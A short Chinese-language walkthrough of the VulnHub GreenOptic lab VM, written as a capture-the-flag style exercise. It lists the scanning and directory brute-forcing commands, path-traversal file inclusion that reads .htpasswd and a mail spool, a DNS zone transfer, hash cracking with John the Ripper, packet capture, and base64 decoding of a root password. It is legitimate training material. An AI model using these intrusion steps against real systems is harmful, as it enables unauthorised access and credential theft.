今天實踐的是vulnhub的GreenOptic鏡像,

下載地址,https://download.vulnhub.com/greenoptic/GreenOptic.ova,

先是用workstation導入,點擊編輯配置就直接崩潰了,

于是又用virtualbox導入,做地址掃描,

sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

有web服務,瀏覽器訪問http://192.168.0.190:10000,

提示了域名,編輯/etc/hosts,添加IP和域名靜態關系,

192.168.0.190      websrv01.greenoptic.vm,

做一下目錄暴破,dirb http://websrv01.greenoptic.vm,

瀏覽器訪問http://websrv01.greenoptic.vm/account,

猜測有文件包含漏洞,瀏覽器上直接利用沒成功,換burpsuite,

發現其它域名,dig @192.168.0.190 greenoptic.vm axfr,

編輯/etc/hosts,添加IP和域名靜態關系,

192.168.0.190      recoveryplan.greenoptic.vm,

瀏覽器訪問http://recoveryplan.greenoptic.vm,

繼續用burpsuite做文件包含,../../../../var/www/.htpasswd,

獲取到staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.,

放到hash文件里,用John The Ripper進行破解,

獲取到staff/wheeler,回到上面的頁面進行登錄,

查看信息,發現提示,

下載dpi.zip,再繼續用burpsuite做文件包含,../../../../var/mail/sam,

獲取到解壓密碼HelloSunshine123,解壓后查看抓包文件,

獲取到alex/FwejAASD1,ssh登錄試試,ssh alex@192.168.0.190,

發現當前賬戶可以抓包,dumpcap -i lo -w test.pcap,

ftp可以把抓包下載出來,

查看抓包文件,

獲取到密碼,

AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=,

base64解碼,

echo "AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=" | base64 -d; echo "",

獲取到rootASfojoj2eozxczzmedlmedASASDKoj3o,

ASfojoj2eozxczzmedlmedASASDKoj3o應該就是root的密碼,

切到root,su -,id確認沒問題。